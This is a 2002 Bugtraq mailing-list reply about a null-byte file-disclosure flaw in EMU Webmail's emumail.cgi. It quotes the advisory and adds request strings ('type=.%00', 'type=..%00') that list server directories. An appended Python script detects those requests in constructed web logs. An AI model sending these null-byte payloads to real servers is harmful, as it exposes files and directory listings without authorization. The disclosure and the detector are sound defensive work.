[24981] in bugtraq


Re: emumail.cgi

daemon@ATHENA.MIT.EDU (N|ghtHawk)
Fri Apr 5 18:35:01 2002

Message-ID: <006601c1dc36$541520a0$2a01a8c0@Asby.multiweb.nl>
Reply-To: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
From: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
To: <bugtraq@securityfocus.org>
Date:   Fri, 5 Apr 2002 02:10:42 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

>name            : emumail.cgi
>date            : 04/04/2002
>description     : EMU Webmail: how to check your email
>from the web. 
>severity        : Low/average-risk
>homepage        : www.emumail.com
>
>Any user can view files on the remote system:
>xxx/PATH/emumail.cgi?type=FILE%00
>
>
>
>The vendor was contacted about that
>

http://site/emumail.cgi?type=.%00

Seems to give the directory index of the current directory.

http://site/emumail.cgi?type=..%00

Seems to give the directory index of ../

-- 
N|ghtHawk
http://www.hackers4hackers.org
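
Added example (not part of the original post and not EMU Webmail code): a web-log check for the requests described in this thread, flagging any request to emumail.cgi whose `type` parameter decodes to a value containing a NUL byte, including the double-encoded form `%2500`. It assumes Common Log Format access logs; the `/cgi-bin/` path, the `inbox` value and all sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Request line inside a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(raw: str, max_rounds: int = 3) -> bytes:
    """Percent-decode repeatedly so double encoding (%2500) is also caught."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def nul_in_type_param(log_line: str, script: str = "emumail.cgi"):
    """Return the decoded text before the NUL if the request to `script`
    carries a NUL byte in its `type` parameter, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + script):
        return None
    # Split the query by hand so the raw, still-encoded value can be inspected.
    for pair in url.query.split("&"):
        name, _, value = pair.partition("=")
        if name == "type":
            decoded = decode_fully(value)
            if b"\x00" in decoded:
                return decoded.split(b"\x00", 1)[0].decode("latin-1")
    return None

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Apr/2002:02:11:00 +0200] "GET /cgi-bin/emumail.cgi?type=.%00 HTTP/1.0" 200 512',
    '192.0.2.10 - - [05/Apr/2002:02:11:04 +0200] "GET /cgi-bin/emumail.cgi?type=..%00 HTTP/1.0" 200 733',
    '192.0.2.44 - - [05/Apr/2002:02:12:30 +0200] "GET /cgi-bin/emumail.cgi?type=inbox HTTP/1.0" 200 2048',
    '192.0.2.10 - - [05/Apr/2002:02:13:09 +0200] "GET /cgi-bin/emumail.cgi?type=..%2500 HTTP/1.0" 200 733',
    '192.0.2.77 - - [05/Apr/2002:02:14:00 +0200] "GET /cgi-bin/other.cgi?type=.%00 HTTP/1.0" 404 210',
]

def scan(lines):
    """Return the pre-NUL prefix of every flagged request, in log order."""
    return [p for p in map(nul_in_type_param, lines) if p is not None]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```
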



